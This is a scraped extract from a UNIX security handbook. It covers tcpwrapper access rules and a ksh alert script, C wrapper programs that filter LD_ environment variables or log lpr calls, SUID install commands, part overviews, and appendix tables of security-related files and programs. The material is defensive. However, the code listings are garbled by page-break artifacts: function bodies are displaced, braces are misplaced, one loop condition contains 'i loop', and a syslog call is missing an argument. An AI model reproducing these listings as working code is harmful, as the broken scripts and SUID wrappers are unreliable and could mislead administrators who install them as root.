all : .pirate.net : deny<br />

all : all : allow<br />

If you discover repeated break-in attempts through telnet and rlogin from all over the world, but you have a particular user who needs<br />

to telnet into your computer from the host sleepy.com, you could accomplish this somewhat more complex security requirement with<br />

the following configuration file:<br />

#<br />

# /etc/hosts.allow:<br />

#<br />

# Allow email from pirate.net, but nothing else:<br />

# Allow telnet & rlogin from sleepy.com, but nowhere else<br />

#<br />

telnetd,rlogind : sleepy.com : allow<br />

telnetd,rlogind : all : deny<br />

in.fingerd : LOCAL : allow<br />

in.fingerd : all : twist /usr/local/bin/external_fingerd_message<br />

all : .pirate.net : deny<br />

all : all : allow<br />

Here's an example that combines two possible options:<br />

#<br />

# /etc/hosts.deny:<br />

#<br />

# Don't allow logins from pirate.net, and log attempts<br />

#<br />

telnetd,rlogind : pirate.net : spawn=(/security/logit %d deny %c %p %a %h %u)&\<br />

: linger 10 : banners /security/banners<br />

In the file /security/banners/telnetd, you would have the following text:<br />

This machine is owned and operated by the Big Whammix Corporation for the exclusive use of Big Whammix<br />

Corporation employees. Your attempt to access this machine is not allowed.<br />

Access to Big Whammix Corporation computers is logged and monitored. If you use or attempt to use a Big Whammix<br />

computer system, you consent to such monitoring and to adhere to Big Whammix Corporation policies about<br />

appropriate use. If you do not agree, then do not attempt use of these systems. Unauthorized use of Big Whammix<br />

Corporation computers may be in violation of state or Federal law, and will be prosecuted.<br />

If you have any questions about this message or policy, contact or call during EST business<br />

hours: 1-800-555-3662.<br />

The banner will be displayed if anyone from pirate.net tries to log in over the net. The system will pause 10 seconds for the message<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_03.htm (6 of 9) [2002-04-12 10:45:59]


to be fully displayed before disconnecting.<br />

In the /security/logit shell file, you could have something similar to the script in Example 22.1. This script puts an entry into the<br />

syslog about the event, and attempts to raise a very visible alert window on the screen of the security administrator's workstation.<br />

Furthermore, it does a reverse finger on the calling host, and for good measure does a netstat and ps on the local machine. This<br />

process is done in the event that some mischief is already occurring that hasn't triggered an alarm.<br />

Note the -n option to the netstat command in the script. This is because DNS can be slow to resolve all the IP numbers to names. You<br />

want the command to complete before the connection is dropped; it is always possible to look the hostnames up later from the log<br />

file.<br />

Example 22.1: alert Script<br />

#!/bin/ksh<br />

set -o nolog -u -h +a +o bgnice +e -m<br />

# Bmon is intended to capture some information about whatever site is<br />

# twisting my doorknob. It is probably higher overhead than I need,<br />

# but...<br />

export PATH=/usr/ucb:/usr/bin:/bin:/usr/etc:/etc<br />

mkdir /tmp/root<br />

# Create /tmp/root in case it doesn't exist.<br />

print "Subject: Notice\nFrom: operator\n\n$@" | /usr/lib/sendmail security<br />

typeset daemon="$1" status="$2" client="$3" pid=$4 addr=$5 host=$6 user=$7<br />

# For most things, we simply want a notice.<br />

# Unsuccessful attempts are warnings<br />

# Unsuccessful attempts on special accounts merit an alert<br />

typeset level=notice<br />

[[ $status != allow ]] && level=warning<br />

[[ $daemon = in.@(rshd|rlogind) && $user = @(root|security) ]] && level=alert<br />

/usr/ucb/logger -t tcpd -p auth.$level "$*" &<br />

umask 037<br />

function mktemp {<br />

typeset temp=/security/log.$$<br />

typeset -Z3 suffix=0<br />

}<br />

[Chapter 22] 22.3 tcpwrapper<br />

while [[ -a $temp.$suffix ]]<br />

do<br />

let suffix+=1<br />

done<br />

logfile=$temp.$suffix<br />

chgrp security $logfile<br />

function Indent {<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_03.htm (7 of 9) [2002-04-12 10:45:59]


}<br />

[Chapter 22] 22.3 tcpwrapper<br />

sed -e 's/^//' >> $logfile<br />

exec 3>&1 >>$logfile 2>&1<br />

date<br />

print "Remote host: $host Remote user: $user"<br />

print ""<br />

print "Local processes:"<br />

ps axg | Indent<br />

print ""<br />

print "Local network connections:"<br />

netstat -n -a -f inet | Indent<br />

print ""<br />

print "Finger of $host"<br />

safe_finger -s @$host|Indent<br />

print ""<br />

[[ $user != unknown ]] && safe_finger -h -p -m $user@$host | Indent<br />

exec >> /netc/log/$daemon.log 2>&1<br />

print "-----------------------"<br />

print "\npid=$pid client=$client addr=$addr user=$user"<br />

print Details in $logfile<br />

date<br />

print ""<br />

# Now bring up an alert box on the admin's workstation<br />

{<br />

print "\ndaemon=$daemon client=$client addr=$addr user=$user"<br />

print Details in $logfile<br />

date<br />

print ""<br />

print -n "(press return to close window.)" >> /tmp/root/alert.$$<br />

} > /tmp/root/alert.$$<br />

integer lines=$(wc -l < /tmp/root/alert.$$ | tr -d ' ')<br />

xterm -display security:0 -fg white -bg red -fn 9x15 -T "ALERT" -fn 9x15B\<br />

-geom 60x$lines+20+20 -e sh -c "cat /tmp/root/alert.$$;read nothing"<br />

/bin/rm /tmp/root/alert.$$<br />

22.3.6 Making Sense of Your tcpwrapper Configuration Files<br />

The configuration files we have shown earlier are simple; unfortunately, sometimes things get complicated. The tcpwrapper system<br />

comes with a utility called tcpdchk that will scan through your configuration file and report on a wide variety of potential<br />

configuration errors.<br />

The tcpwrapper system comes with another utility program called tcpdmatch, which allows you to simulate an incoming connection<br />

and determine if the connection would be permitted or blocked with your current configuration files.<br />

Programs like tcpdchk and tcpdmatch are excellent complements to the security program tcpwrapper, because they help you head off<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_03.htm (8 of 9) [2002-04-12 10:45:59]


[Chapter 22] 22.3 tcpwrapper<br />

security problems before they happen. Wietse Venema is to be complimented for thinking to write and include them in his<br />

tcpwrapper release; other programmers should follow his example.<br />

22.2 sendmail (smap/smapd)<br />

Wrapper<br />

22.4 SOCKS<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_03.htm (9 of 9) [2002-04-12 10:45:59]


[Chapter 22] 22.6 Writing Your Own Wrappers<br />

Chapter 22<br />

Wrappers and Proxies<br />

22.6 Writing Your Own Wrappers<br />

In this section, we describe the reasons for writing your own wrappers. In most cases, you won't need to<br />

write your own wrappers; you'll find that the standard <strong>UNIX</strong> wrappers will suit most situations.<br />

22.6.1 Wrappers That Provide Temporary Patches<br />

A typical case in which you might want to build a wrapper yourself is when there is a report of a new bug<br />

in some existing software on your system that is triggered or aggravated when an environment variable<br />

or input is uncontrolled. By writing a small wrapper, you can filter what reaches the real program, and<br />

you can reset its environment. The software can thus continue to be used until such time as your vendor<br />

releases a formal patch.<br />

The code in Example 22-2 is an example of such a wrapper. It was originally written by Wietse Venema<br />

and released as part of CERT Advisory 11, in 1992. An unexpected interaction between Sun<br />

Microsystems' shared library implementation and various SUID and SGID programs could result in<br />

unauthorized privileges being granted to users. The temporary fix to the problem was to put a wrapper<br />

program around susceptible programs (such as the sendmail program) to filter out environment variables<br />

that referenced unauthorized shared libraries - those variables beginning with the characters "LD_".<br />

Example 22.2: Wrapper Program for sendmail<br />

/* Start of C program source */<br />

/* Change the next line to reflect the full pathname<br />

of the file to be protected by the wrapper code */<br />

#define COMMAND "/usr/lib/sendmail.dist"<br />

#define VAR_NAME "LD_"<br />

main(argc,argv,envp)<br />

int argc;<br />

char **argv;<br />

char **envp;<br />

{<br />

register char **cpp;<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_06.htm (1 of 4) [2002-04-12 10:45:59]


[Chapter 22] 22.6 Writing Your Own Wrappers<br />

}<br />

register char **xpp;<br />

register char *cp;<br />

for (cpp = envp; cp = *cpp;) {<br />

if (strncmp(cp, VAR_NAME, strlen(VAR_NAME))==0) {<br />

for (xpp = cpp; xpp[0] = xpp[1]; xpp++){<br />

} /* void */ ;<br />

}<br />

else {<br />

cpp++;<br />

}<br />

}<br />

execv(COMMAND, argv);<br />

perror(COMMAND);<br />

exit(1);<br />

/* End of C program source */<br />

To use this code, you would compile it, move the original sendmail to a safe location, and then install the<br />

wrapper in place of the real program. For the example above, for instance, you would issue the following<br />

commands as the superuser:<br />

# make wrapper<br />

# mv /usr/lib/sendmail /usr/lib/sendmail.dist<br />

# chmod 100 /usr/lib/sendmail.dist<br />

# mv ./wrapper /usr/lib/sendmail<br />

# chown root /usr/lib/sendmail<br />

# chmod 4711 /usr/lib/sendmail<br />

22.6.2 Wrappers That Provide Extra Logging<br />

Another case in which you might want to build your own wrapper code is when you wish to do some<br />

extra logging of a program execution, or to perform additional authentication of a user. The use of a<br />

wrapper allows you to do this without modifying the underlying code.<br />

Suppose you suspect some user of your system of misusing the system's printer. You wish to gain some<br />

additional log information to help you determine what is being done. So, you might use a wrapper such<br />

as the one in Example 22.3.<br />

Example 22.3: : A Logging Wrapper<br />

/* Start of C program source */<br />

/* Change the next line to reflect the full pathname<br />

of the file to be protected by the wrapper code */<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_06.htm (2 of 4) [2002-04-12 10:45:59]


[Chapter 22] 22.6 Writing Your Own Wrappers<br />

#define COMMAND "/usr/lib/.hidden/lpr"<br />

#include <br />

main(argc,argv,envp)<br />

int argc;<br />

char **argv, **envp;<br />

{<br />

int iloop;<br />

}<br />

openlog("xtra-log", LOG_PID, LOG_LPR);<br />

syslog(LOG_INFO, "lpr invoked with %d arguments", argc);<br />

for (iloop = 1; i loop < argc; iloop++){<br />

if(strlen(argv[iloop])>1023) argv[iloop][1023]=0;<br />

syslog(LOG_INFO, "arg %d is `%s'", argv[iloop]);<br />

}<br />

syslog(LOG_INFO, "uid is %d", getuid());<br />

closelog();<br />

execv(COMMAND, argv);<br />

perror(COMMAND);<br />

exit(1);<br />

/* End of C program source */<br />

To use this code, you follow the same basic steps as in the previous example: you compile the code,<br />

make the hidden directory, move the original lpr to a safe location, and then install the wrapper in place<br />

of the real program. For this example, you might issue the following commands as the superuser:<br />

# make wrapper<br />

# mkdir /usr/lib/.hidden<br />

# chmod 700 /usr/lib/.hidden<br />

# mv /usr/bin/lpr /usr/lib/.hidden/lpr<br />

# chmod 100 /usr/lib/.hidden/lpr<br />

# mv ./wrapper /usr/bin/lpr<br />

# chown root /usr/bin/lpr<br />

# chmod 4711 /usr/bin/lpr<br />

Now, whenever someone executes the lpr command, you will find a copy of the arguments and other<br />

useful information in the syslog. See Chapter 10, Auditing and Logging, for more information on syslog<br />

and other logging facilities.<br />

The above example can be modified in various ways to do other logging, change directories, or perform<br />

other checks and changes that might be necessary for what you want to do.<br />

You can also adopt the concept we've discussed to put a wrapper around shell files you want to make<br />

SUID. As we noted in Chapter 5, The <strong>UNIX</strong> Filesystem, on most older <strong>UNIX</strong> systems, SUID shell files<br />

are a security problem. You can create a wrapper that is SUID, cleans up the environment (including<br />

resetting the PATH variable, and removing IFS), and then exec's the shell file from a protected directory.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_06.htm (3 of 4) [2002-04-12 10:45:59]


[Chapter 22] 22.6 Writing Your Own Wrappers<br />

In this way, you'll get all of the benefits of a SUID shell file, and fewer (but, alas, still some) of the<br />

dangers.<br />

22.5 UDP Relayer 23. Writing <strong>Sec</strong>ure SUID and<br />

Network Programs<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_06.htm (4 of 4) [2002-04-12 10:45:59]


[Part VI] Handling <strong>Sec</strong>urity Incidents<br />

Part VI<br />

Part VI: Handling <strong>Sec</strong>urity Incidents<br />

This part of the book contains instructions for what to do if your computer's security is compromised.<br />

These chapters will also help system administrators protect their systems from authorized users who are<br />

misusing their privileges.<br />

●<br />

●<br />

●<br />

●<br />

Chapter 24, Discovering a Break-in, contains step-by-step directions to follow if you discover that<br />

an unauthorized person is using your computer.<br />

Chapter 25, Denial of Service Attacks and Solutions, describes ways that legitimate, authorized<br />

users can make your system inoperale, ways that you can find out who is doing what, and what to<br />

do about it.<br />

Chapter 26, Computer <strong>Sec</strong>urity and U.S. Law. Occasionally the only thing you can do is sue or try<br />

to have your attackers thrown into jail. This chapter describes the legal recourse you may have<br />

after a security breach and discusses why legal approaches are often not helpful. It also covers<br />

some emerging concerns about running server sites connected to a wide area network such as the<br />

internet.<br />

Chapter 27, Who Do You Trust?, is a conluding chapter that makes the point that somewhere<br />

along the line, you need to trust a few things and people in order to sleep at night. Are you trusting<br />

the right ones?<br />

23.9 A Good Random Seed<br />

Generator<br />

24. Discovering a Break-in<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/part06.htm [2002-04-12 10:45:59]


[Part VII] Appendixes<br />

Part VII<br />

Part VII: Appendixes<br />

These appendixes provide a number of useful checklists and referances.<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Appendix A, <strong>UNIX</strong> <strong>Sec</strong>urity Checklist, contains a point-by-point list of many of the suggestions<br />

made in the text of the book.<br />

Appendix B, Important Files, is a list of the important files in the <strong>UNIX</strong> filesystem, and a brief<br />

discussion of their security implications.<br />

Appendix C, <strong>UNIX</strong> Processes, is a technical discussion of how the <strong>UNIX</strong> system manages<br />

processes. It also describes some of the special attributes of processes, including the UID, GID,<br />

and SUID.<br />

Appendix D, Paper Sources, list books, article, and magazines about computer security.<br />

Appendix E, Electronic Resources, is a brif listing of some significant security tools to use with<br />

<strong>UNIX</strong>, including directions on where to find them on the <strong>Internet</strong>.<br />

Appendix F, Organizations, contains the names, telephone numbers, and addresses of<br />

organizations that are devoted to seeing computers become more secure.<br />

Appendix G, Table of IP Services, lists the common TCP/IP protocols, along with their port<br />

numbers and suggested handling by a firewall.<br />

27.4 What All This Means A. <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/part07.htm [2002-04-12 10:45:59]


[Appendix B] Important Files<br />

B. Important Files<br />

Contents:<br />

<strong>Sec</strong>urity-Related Devices and Files<br />

Important Files in Your Home Directory<br />

SUID and SGID Files<br />

Appendix B<br />

This appendix lists some of the files on <strong>UNIX</strong> systems that are important from the perspective of overall<br />

system security. We have tried to make this as comprehensive a list as possible. Nevertheless, there are<br />

doubtless some system-specific files that we have omitted. If you don't see a file here that you think<br />

should be added, please let us know.<br />

B.1 <strong>Sec</strong>urity-Related Devices and Files<br />

This section lists many of the devices, files, and programs mentioned in this book. Note that these<br />

programs and files may be located in different directories under your version of <strong>UNIX</strong>.<br />

B.1.1 Devices<br />

All <strong>UNIX</strong> devices potentially impact security. You should, however, pay special attention to the<br />

following entries. On many systems, including SVR4, these entries are links to files in the /devices<br />

directory, but the actual names in that directory depend on the underlying hardware configuration. Thus,<br />

we will reference them by the /dev.<br />

Name Description<br />

/dev/audio Audio input/output device<br />

/dev/console System console<br />

/dev/*diskette* Floppy disk device<br />

/dev/dsk/* System disks<br />

/dev/fbs/* Framebuffers<br />

/dev/fd/* File descriptors (/dev/fd/0 is a synonym for stdin, /dev/fd/1 for stdout, etc)<br />

/dev/*fd* Floppy disk drives<br />

/dev/ip IP interface<br />

/dev/kbd Keyboard device<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appb_01.htm (1 of 7) [2002-04-12 10:46:00]


[Appendix B] Important Files<br />

/dev/klog Kernel log device<br />

/dev/kmem Kernel memory<br />

/dev/kstat Kernel statistics device<br />

/dev/log Log device<br />

/dev/mem Memory<br />

/dev/modem Modem<br />

/dev/null Null device<br />

/dev/pty* Pseudo terminals<br />

/dev/random Random device<br />

/dev/rdsk Raw disk devices<br />

/dev/rmt8 Tape device<br />

/dev/*sd* SCSI disks<br />

/dev/*st* SCSI tapes<br />

/dev/tty* Terminal devices<br />

/dev/zero Source of nulls<br />

B.1.2 Log Files<br />

Name Description<br />

/etc/utmp Lists users currently logged into system<br />

/etc/utmpx Extended utmp file<br />

/etc/wtmp Records all logins and logouts<br />

/etc/wtmpx Extended wtmp file<br />

/usr/adm/acct[1] Records commands executed<br />

/usr/adm/lastlog Records the last time a user logged in<br />

/usr/adm/messages Records important messages<br />

/usr/adm/pacct Accounting for System V (usually)<br />

/usr/adm/saveacct Records accounting information<br />

/usr/adm/wtmp Records all logins and logouts<br />

[1] /usr/adm may actually be a link to /var/adm.<br />

B.1.3 System Databases<br />

Name Description<br />

/etc/bootparams Boot parameters database<br />

/etc/cron/* System V start-up files<br />

/etc/defaultdomain Default NIS domain<br />

/etc/defaultrouter Default router to which your workstation sends packets destined for other<br />

networks<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appb_01.htm (2 of 7) [2002-04-12 10:46:00]


[Appendix B] Important Files<br />

/etc/defaults/su Default environment for root after su<br />

/etc/defaults/login Default environment for login<br />

/etc/dfs/dfstab SVR4<br />

/etc/dialup List of dial-up lines<br />

/etc/dumpdates Records when a partition was dumped<br />

/etc/d_passwd File of dial-up passwords (some systems)<br />

/etc/ethers Mapping of ethernet addresses to IP addresses for RARP<br />

/etc/exports NFS exports list (Berkeley-derived systems)<br />

/etc/fbtab Login device permission (SunOS systems)<br />

/etc/filesystems List of AIX filesystems the computer supports<br />

/etc/ftpusers List of users not allowed to use FTP over the network<br />

/etc/fstab Filesystems to mount (Berkeley)<br />

/etc/group Denotes membership in groups<br />

/etc/hostnames.xx Hostname for interface xx<br />

/etc/hosts List of IP hosts and host names<br />

/etc/hosts.allow Hosts for which tcpwrapper allows connection<br />

/etc/hosts.deny Hosts for which tcpwrapper denies connection<br />

/etc/hosts.equiv Lists trusted machines<br />

/etc/hosts.lpd Lists machines allowed to print on your computer's printer<br />

/etc/inetd.conf Configuration file for /etc/inetd<br />

/etc/init.d/* System V start-up files<br />

/etc/inittab tty start-up information; controls what happens at various run levels<br />

(System V)<br />

/etc/keystore Used in SunOS 4.0 to store cryptography keys<br />

/etc/login.access Used to control who can log in from where (logdaemon and some more<br />

recent BSD systems)<br />

/etc/logindevperm Login device permissions (Solaris systems)<br />

/etc/master.passwd Shadow password file on some BSD systems<br />

/etc/motd Message of the day<br />

/etc/mnttab Table of mounted devices<br />

/etc/netgroup Netgroups file for NIS<br />

/etc/netid Netname database<br />

/etc/netstart Network configuration for some BSD systems<br />

/etc/nodename Name of your computer<br />

/etc/ntp.conf NTP configuration file<br />

/etc/nsswitch.conf For Solaris (files, NIS, NIS+), the order in which system databases for<br />

accounts, services, etc., should be read<br />

/etc/passwd Users and encrypted password<br />

/etc/printcap Printer configuration file<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appb_01.htm (3 of 7) [2002-04-12 10:46:00]


[Appendix B] Important Files<br />

/etc/profile Default user profile<br />

/etc/publickey Computer's public key<br />

/etc/rc* Reboot commands script<br />

/etc/rc?.d/* System V start-up files for each run level<br />

/etc/remote Modem and telephone-number information for tip<br />

/etc/resolv.conf DNS configuration file<br />

/etc/security/* Various operating system security files<br />

/etc/security/passwd.adjunct Shadow-password file for SunOS<br />

/etc/services Lists network services<br />

/etc/shadow Shadow password file<br />

/etc/shells Legal shells for FTP users and for legal shells to the chsh command<br />

/etc/skeykeys Used by S/Key<br />

/etc/socks.conf SOCKS configuration file<br />

/etc/syslog.conf syslog configuration file<br />

/etc/tftpaccess.ctl Access to TFTP daemon (AIX systems)<br />

/etc/timezone Your time zone<br />

/etc/ttys, /etc/ttytab Defines active terminals<br />

/etc/utmp Lists users currently logged into system<br />

/etc/vfstab Filesystems to mount at boot time (SVR4)<br />

/etc/X0.hosts Allows access to X0 server<br />

/usr/lib/aliases or/etc/aliases Lists mail aliases for /usr/lib/sendmail (maybe in /etc or/etc/sendmail)<br />

/usr/lib/crontab Scheduled execution file<br />

/usr/lib/sendmail.cf sendmail configuration file<br />

/usr/lib/uucp/Devices UUCP BNU<br />

/usr/lib/uucp/L.cmds UUCP Version 2<br />

/usr/lib/uucp/L-devices UUCP Version 2<br />

/usr/lib/uucp/Permissions UCP BNU<br />

/usr/lib/uucp/USERFILE UUCP Version 2<br />

/var/spool/cron* cron files include cron.allow cron.deny, at.allow, and at.deny<br />

/var/spool/cron/crontabs/* Individual user files (System V)<br />

B.1.4 /bin Programs<br />

Some of these programs may be found in other directories, including /usr/bin, /sbin, /usr/sbin,<br />

/usr/ccs/bin, and /usr/local/bin.<br />

Name Description<br />

adb Debugger; also can be used to edit kernel<br />

cc C compiler<br />

cd, chdir Built in shell command<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appb_01.htm (4 of 7) [2002-04-12 10:46:00]


[Appendix B] Important Files<br />

chgrp Changes group of files<br />

chmod Changes permissions of files<br />

chown Changes owner of files<br />

chsh Changes a user's shell<br />

cp Copies files<br />

crypt Encrypts files<br />

csh C-shell command interpreter<br />

cu Places telephone calls<br />

dbx Debugger<br />

des DES encryption/decryption program<br />

ex3.7preserve, ex3.7recover vi buffer recovery programs<br />

find Finds files<br />

finger Prints information about users<br />

fsirand Randomizes i-node numbers on a disk<br />

ftp Transfers files on a network<br />

gcore Gets a core file for a running process<br />

kill Kills processes<br />

kinit Authenticates to Kerberos<br />

ksh Korn-shell command interpreter<br />

last Prints when users logged on<br />

lastcomm Prints what commands were run<br />

limit Changes process limits<br />

login Prints password<br />

ls Lists files<br />

mail Sends mail<br />

netstat Prints status of network<br />

newgrp Changes your group<br />

perl suidperl taintperl System administration and programming language. SUID perl has special<br />

provisions for SUID programs; taintperl has special data-tainting features<br />

passwd Changes passwords<br />

ps Displays processes<br />

pwd Prints your working directory<br />

renice Changes the priority of a process<br />

rlogin Logs you into another machine<br />

rsh, krsh, rksh Restricted shell (System V)<br />

rsh Remote shell (named remsh on System V)<br />

sh Bourne-shell command interpreter<br />

strings Prints the strings in a file<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appb_01.htm (5 of 7) [2002-04-12 10:46:00]


[Appendix B] Important Files<br />

su Become the superuser, or change your current user ID<br />

sysadmsh System administrator's shell<br />

telnet Becomes a terminal on another machine<br />

tip Calls another machine<br />

umask Changes your umask (shell built-in)<br />

users Prints users logged in<br />

uucheck Checks UUCP security<br />

uucico Transfers UUCP files<br />

uucp Queues files for transfer by UUCP<br />

uudecode Decodes uu-encoded files<br />

uux Queues programs for execution by UUCP<br />

w Prints what people are doing<br />

who Prints who is logged in<br />

write Prints messages on another's terminal<br />

xhost Allows other hosts to access your X Window Server<br />

XScreensaver Clears and locks an X screen<br />

yppasswd Changes your NIS password<br />

B.1.5 /etc Programs<br />

The following programs are typically placed in the /etc, /sbin, /usr/sbin, or /usr/etc directories.<br />

Name Description<br />

accton Turns on accounting<br />

arp Address resolution protocol<br />

comsat Alerts to incoming mail<br />

dmesg Prints messages from system boot<br />

exportfs Export a filesystem (Berkeley)<br />

fingerd or in.fingerd Finger daemon<br />

ftpd or in.ftpd FTP daemon<br />

fsck Filesystem-consistency checker<br />

getty Prints login:<br />

inetd <strong>Internet</strong> daemon<br />

init First program to run<br />

lockd lock daemon<br />

lpc Line-printer control<br />

makekey Runs crypt() library routine (in /usr/lib)<br />

mount Mounts partitions<br />

ntalkd Talk daemon<br />

ping Network test program<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appb_01.htm (6 of 7) [2002-04-12 10:46:00]


[Appendix B] Important Files<br />

rc? Boot scripts<br />

rc?.d Directories containing boot scripts<br />

rdump Remote dump program<br />

renice Changes priority of programs<br />

rexecd or in.rexecd Remote execution daemon<br />

rlogind or in.rlogind Remote login daemon<br />

routed Route daemon<br />

rshd Remote shell daemon<br />

sa Processes accounting logs<br />

sendmail Network mailer program (may be in /lib or /lib/sendmail)<br />

share Export a filesystem (SVR4)<br />

showmount Shows clients that have mounted a filesystem<br />

sockd SOCKS daemon<br />

syslogd System log daemon<br />

talkd or in.talkd Talk daemon<br />

tcpd TCP wrapper<br />

telnetd or in.telnetd Telnet daemon<br />

tftpd or in.tftpd TFTP daemon<br />

ttymon Monitors terminal ports<br />

uucpd UUCP over TCP/IP daemon<br />

yp/makedbm Makes an NIS database<br />

A.1 Preface B.2 Important Files in Your<br />

Home Directory<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appb_01.htm (7 of 7) [2002-04-12 10:46:00]


[Appendix B] B.2 Important Files in Your Home Directory<br />

Appendix B<br />

Important Files<br />

B.2 Important Files in Your Home Directory<br />

Name Description<br />

.cshrc C-shell initialization command; run at each csh invocation<br />

.emacs Start-up file for GNU Emacs<br />

.exrc Start-up commands for ex and vi editors<br />

.forward Contains an address that tells /usr/lib/sendmail where to<br />

forward your electronic mail<br />

.history C-shell history<br />

.kshrc Korn shell start-up file<br />

.login C-shell initialization command script; run only on login<br />

.logout C-shell commands executed automatically on logout<br />

.mailrc Mail start-up file<br />

.netrc Initialization and macros for FTP<br />

.procmailrc Commands and macros for procmail mail agent<br />

.profile Bourne- and Korn-shell initialization commands<br />

.rhosts Contains the names of the remote accounts that can log into<br />

your account via rsh and rlogin without providing a password<br />

.XDefaults, .Xinit, .XResource, .Xsession X Window System start-up files<br />

.xinitrc Start-up file for xinit<br />

B.1 <strong>Sec</strong>urity-Related Devices<br />

and Files<br />

B.3 SUID and SGID Files<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appb_02.htm [2002-04-12 10:46:01]

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!